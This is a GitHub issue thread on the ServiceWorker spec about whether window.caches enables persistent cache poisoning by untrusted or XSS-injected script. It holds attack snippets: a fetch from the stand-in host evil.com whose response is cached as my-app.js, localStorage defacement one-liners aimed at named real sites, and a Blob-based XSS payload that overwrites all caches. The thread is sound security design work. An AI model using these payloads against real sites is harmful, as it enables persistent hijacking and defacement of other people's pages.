### ISSUE TITLE
Should window.caches be removed (or readonly) for security reasons?

### ISSUE THREAD

**Issue by manuelmitasch** [slightlyoff/ServiceWorker#698]
I believe that a combination of `window.caches` and `cache.put` gives a script loaded from a foreign origin the opportunity to add/update resources into the caches with malicious content. Or did I miss something?

If a page includes a script `some-library.js` from a foreign origin (CDN or other). This script could include something like:

```javascript
var goodRequest = new Request('my-app.js');
var badRequest = new Request('https://evil.com/my-bad-app.js', {mode: 'no-cors'});

fetch(badRequest).then(function(badResponse) {
  return window.caches.open("my-cache-v1").then(function(cache) {
      // put bad response for good request into cache
      return cache.put(goodRequest, badResponse);
    });
  }).then(function() {
    console.log('from now on content of evil.com/my-bad-app.js will be served as my-app.js');
  });
);
```

**Possible solution**
Remove window.caches. To me having the caches available on window seems like leaking SW internals into global scope. Messing with caches should only be allowed within service worker (as same origin is guaranteed).

**Comment by jakearchibald** [comment]
> I believe that a combination of `window.caches` and `cache.put` gives a script loaded from a foreign origin the opportunity to add/update resources into the caches with malicious content.

It can, yes. It can also poison localstorage, indexeddb, cookies, change the destination of forms (such as logins), listen to all the user's keypresses etc etc. Basically, *never* let an untrusted source execute code on your origin.

> Remove window.caches.

I don't think so. Caches aren't special here. If you let an evil third part run code on your origin, you're pretty screwed.

> To me having the caches available on window seems like leaking SW internals into global scope

Caches aren't SW internals, they're just a storage system like indexeddb & localstorage.

> Messing with caches should only be allowed within service worker (as same origin is guaranteed).

Same origin isn't guaranteed within a SW. You can use `importScripts` to pull in scripts from other origins. As with all scripts, only pull in scripts you trust.

**Comment by jakearchibald** [comment]
Eg go to http://www.theguardian.com/ and run

```js
localStorage.setItem('gu.fonts.GuardianEgyptianWeb.4e18732efa74d785889c2f7aa589be4a', '{"value": "html > * { display: none; } html::before { content: \\"HAXORED\\"; }"}')
```

**Comment by jakearchibald** [comment]
Or http://smashingconf.com/ and run:

```js
localStorage.setItem('font_css_cache', 'html > * { display: none; } html::before { content: "HAXORED"; }')
```

**Comment by manuelmitasch** [comment]
Thank you Jake for your feedback.

Of course you should never include scripts from untrusted sources. However, it is and will be done for a long time. You could also argue, that if you control an executed script you could just write whatever content into the DOM. Yes, but the consequences of the attack will not (possibly) persist forever (after the attacking code was removed).

I agree that other APIs are vulnerable in such a scenario too. However, a cache API will represent a much more interesting point of attack. By having access to the cache API you do not need any knowledge of the website or application. And again, the consequences of the attack will possibly persist forever.

Your localstorage examples has two big differences:
1) You need to have understanding of the website you want to attack. Infecting an "untrusted" source (in a very bad scenario that could be the jquery CDN) will not have an impact on all consumers. 
2) The only reason this attack works is because the vulnerable websites are simply inserting the content from localstorage into the DOM. The attack could be prevented by checking the content before inserting. How can you prevent abuse of the cache API (besides not including external scripts)?

To have the web platform be able to compete with native it also has to be secure. I love the idea to make new API HTTPS-only and even discuss moving older APIs to HTTPS-only. I understand that `window.caches` offer some convenience. I just think that by removing `window.caches` the whole ServiceWorker spec would become more secure by default. If you decide to use `importScripts` then it's your decision and that comes with it's own implications.

**Comment by wanderview** [comment]
> The only reason this attack works is because the vulnerable websites are simply inserting the content from localstorage into the DOM. The attack could be prevented by checking the content before inserting. How can you prevent abuse of the cache API (besides not including external scripts)?

I think you mean check the content when *retrieved* from localStorage.  And you could do the same thing with Cache API in your service worker script.

I tend to agree with Jake here, but maybe we could add an extra safety belt.

For example, a `cache.match(url, { trusted-only: true })` option.  When set this would require that the security info (cert) associated with the Response must match the request URL and be computed as trusted.

**Comment by manuelmitasch** [comment]
> I think you mean check the content when retrieved from localStorage. And you could do the same thing with Cache API in your service worker script.

True, it should be possible to check the response and request url for equality.

> For example, a cache.match(url, { trusted-only: true }) option. When set this would require that the security info (cert) associated with the Response must match the request URL and be computed as trusted.

Sounds, like a good addition. It would make opting into a more secure model easier.
Still, secure by default is better than secure via opt-in.

What are the use cases that are only possible with `window.caches`?

**Comment by jakearchibald** [comment]
Is there any difference between `trusted-only` and `caches.match(url).then(r => r.url == url ? r : null)`?

> What are the use cases that are only possible with window.caches?

Take https://wiki-offline.jakearchibald.com/ - when articles are cached the page handles it (via `window.caches`. When cached articles are displayed the page fetches them from a cache. The list of cached articles is all page-side too.

Sure, you can pass messages to & from the SW to do this stuff, but it's really hacky (see https://github.com/jakearchibald/trained-to-thrill/blob/master/src/js/sw/index.js#L71).

Browser storage is accessible in both pages and workers. We need a really good reason to make an exception here, and I don't think we have one.

If you make the cache API more difficult to use, developers will move to another storage system such as idb, which can be accessed between page & worker. Eg, the original cache polyfill was idb based.

**Comment by manuelmitasch** [comment]
> Is there any difference between trusted-only and caches.match(url).then(r => r.url == url ? r : null)?

I believe there is no difference. Just brevity.

> If you make the cache API more difficult to use, developers will move to another storage system such as idb, which can be accessed between page & worker. Eg, the original cache polyfill was idb based.

I agree.

> Browser storage is accessible in both pages and workers. We need a really good reason to make an exception here, and I don't think we have one.

I agree, but I still have a bad feeling about the combination of service worker capabilities and a global caches API.

I think it would make sense to consider an API to "protect" caches. Let's call it a security feature, while at the same time not limiting ease of use for more advanced use cases. 

Another idea (besides `trusted-only`) would be to mark specific caches as "limited to service workers" during the cache creation.

```javascript
// In Serviceworker
self.addEventListener('install', function(event) {
  caches.open('secure-cache-name', {sw-only: true}).then(function() {
    // do something
  });
});

// In Page
caches.open('secure-cache-name'); // throws an Error
```

This is definitely a bigger change compared to `trusted-only`. As it is not possible to control whether the cache was created from a page before (without the `sw-only` option set), the `sw-only` option would need to be set to true even if the cache already exists. (I guess setting it to false should not work). It feels a bit awkward.

**Comment by domenic** [comment]
It sounds like your "bad feeling" might be satisfied by a CSP header to remove all access to storage APIs in the browser.

**Comment by wanderview** [comment]
> Is there any difference between trusted-only and caches.match(url).then(r => r.url == url ? r : null)?

The existence of a trusted certificate that matches that URL on the response?  I don't see how your `== url` in js is really equivalent.

That being said, I think there would be more details to figure out for something like `trusted-only`.  For example, do synthetically created responses get security info associated with them?  In gecko, we give them the service worker scripts security info in order to mixed content problems.  I don't think this is spec'd, though.

**Comment by jakearchibald** [comment]
Reopening as @sirdarckcat pointed out the following attack:

1. Attacker can execute scripts due to XSS
1. Attacker pollutes caches
1. Attacker polls caches, polluting any that are added

This (potentially) means the attacker defends against any "fixes" the site owner attempts to ship.

Although this is possible with idb and localstorage, it's much more likely with caches.

We need to offer some way out of this, which may include:
* Allow a serviceworker to pause execution of scripts on pages (ugh)
* Allow a serviceworker to navigate pages (#681) to somewhere safe, another origin even, then it can clean its caches

+@slightlyoff

**Comment by jakearchibald** [comment]
…so maybe we *should* make `window.caches` read-only until we solve this.

**Comment by domenic** [comment]
I don't think any solution that applies only to caches makes sense. It should apply to all types of storage uniformly.

> Although this is possible with idb and localstorage, it's much more likely with caches.

This seems false.

**Comment by manuelmitasch** [comment]
> I don't think any solution that applies only to caches makes sense. It should apply to all types of storage uniformly.

While I agree that the problem exists for all storage types, it seems unrealistic to solve it for existing APIs without breaking existing applications. At the same time it does not seem like a good idea to introduce new APIs with the same problem.

>> Although this is possible with idb and localstorage, it's much more likely with caches.

> This seems false.

Can you elaborate why this seems false to you?
To me the combination of service workers ability to intercept fetch events and a general purpose cache API makes attacks on these APIs very likely. Therefore, security issues must be considered very carefully.

**Comment by manuelmitasch** [comment]
> It sounds like your "bad feeling" might be satisfied by a CSP header to remove all access to storage APIs in the browser.

What would be the difference between setting the CSP header that removes all access to storage APIs and not using the storage APIs in service workers?

I think it is more desirable to introduce a CSP or similar mechanism that:
* limits global APIs to read-only access
* retains full API access in service workers
* allows selecting which storage API is affected by the CSP header (or similar)

**Comment by wanderview** [comment]
Is this only an issue for non-trusted (http://) resources?

It seems if a SW stores an https:// resource and which is then overwritten with a polluted Response, then the polluted Response would be missing the security info for the origin.  I would expect the browser to give a mixed-content warning or something similar when this response is passed to respondWith().

I guess the spec does not define how to trust or not-trust synthetically created responses, though.

**Comment by domenic** [comment]
Confining access to service workers is not a defense mechanism. Anything that works there should go on window as well, and vice versa.

**Comment by sirdarckcat** [comment]
wouldn't an XSS be able to bypass the CSP storage restrictions with URL.createObjectURL(new Blob(['<script>caches.keys().then(keys => keys.map(key => caches.open(key).then(cache => cache.add(new Request('/'), new Response(new Blob(["<script>attack<\/script>"], {type: "text/html"}))))))</script>'])) or something like that

**Comment by sirdarckcat** [comment]
the reason that would bypass it, is because the new resource wouldnt be bound to the CSP of the previous page

**Comment by manuelmitasch** [comment]
Maybe it's best to focus on the root of the problem again: the cache's `put` method.
I think it is not possible to reliably check if a response belongs to a request due to HTTP redirects!?

Therefore the question is, what use cases do we lose if we remove the `put` method?
I think responding with a programmatically created fallback file is not a problem. We don't need the cache's `put` method here, we can simply respond directly from the service worker.

**Comment by manuelmitasch** [comment]
> Therefore the question is, what use cases do we lose if we remove the put method?

Looking at Jakes [Offline Cookbook](http://jakearchibald.com/2014/offline-cookbook/) it seems `put` is needed a lot. Basically, whenever a fetched resource needs to be cached and responded in one step. This strange clone thing ...

**Comment by manuelmitasch** [comment]
> Confining access to service workers is not a defense mechanism. Anything that works there should go on window as well, and vice versa.

Why not? The context of the page is not safe. The context of the service worker should be safe (HTTPS-only; only explicit message passing).

**Comment by domenic** [comment]
The page is exactly as safe as the service worker. Both are HTTPS-only, and both can be XSSed (since both of them execute code).

**Comment by wanderview** [comment]
Does the box concept from @annevk's storage proposal help here?

  https://wiki.whatwg.org/wiki/Storage

A box could be marked as service-worker-only and then all storage inside would be read only on window/etc.

**Comment by jakearchibald** [comment]
> Does the box concept from @annevk's storage proposal help here?

Hmm, I don't think so. I mean, it would allow you to restrict it to ServiceWorkers, but you'd still have the same problems with storage that isn't restricted to ServiceWorkers.

**Comment by jakearchibald** [comment]
So yeah, all browser storage that ServiceWorker may use to construct responses is vulnerable to this attack, not just `caches`, the only reason `caches` is more vulnerable is that people are more likely to use it for ServiceWorker responses than say IDB (in fact, I've seen people hack `caches` to be a simple key/value store rather than use IDB).

We *do* need a solution to this that works for all storage. Maybe a kill switch that moves all same-origin pages onto unique origins, like `sandbox`.

Still trying to figure out if restricting `window.caches` is an overreaction.

**Comment by wanderview** [comment]
> Still trying to figure out if restricting window.caches is an overreaction.

If we are considering `caches` specific changes, what about adding something the SW script can use to verify the resource?  Something as simple as an attribute that returned 'serviceworker', 'window', etc depending on the context that .put() the resource in the cache.

**Comment by wanderview** [comment]
Another possible `caches` specific change would be something like:

```
// on service worker
caches.open('foo', { service-worker-only: true }).then(function(cache) {
  // rejects if cache already exists and is not service-worker-only
}):

// on window
caches.open('foo').then(function(cache) {
  // rejects because its not a service worker
});
```

I guess I would prefer something like this to just completely banning caches on window/worker.

**Comment by jakearchibald** [comment]
> I guess I would prefer something like this to just completely banning caches on window/worker.

Yeah, I don't want that either. The read-only idea would be a temporary measure until we have a solution to the attack. Going read-only is easier to revert than adding a new API. But going read only may be an overreaction because other storage APIs are just as vulnerable.

**Comment by annevk** [comment]
> The context of the page is not safe. The context of the service worker should be safe (HTTPS-only; only explicit message passing).

That doesn't make sense. They are equally safe. Note that caches do not cross origins in any way. Scripts can, but they can only access the origin (and its caches) from the page they are embedded in.

The only thing we should maybe consider is restricting caches to HTTPS always. It doesn't make much sense to have new ways of persistent state in an HTTP context.

**Comment by Adria2** [comment]
I'm using SW in production, and this would break my app.
The most important pathway it uses is injecting synthetic responses into the cache in SharedWorker, and occasionally from Window.

Obviously biased, but I'd prefer WorkerGlobalScope.caches wasn't broken even temporarily without a flag or call to reactivate it from SW.

Also, it never occurred to me that cache wasn't already HTTPS only.

**Comment by slightlyoff** [comment]
The root issue is addressed by Clear Site Data: http://w3c.github.io/webappsec-clear-site-data/

Trying to remediate the cache concerns from inside the app is bound to fail. You've gotta nuke it from space, which is what Clear Site Data does. Closing with the resolution that we'll leave caches mutable and available from the window object.

/cc @mkwst @metromoxie
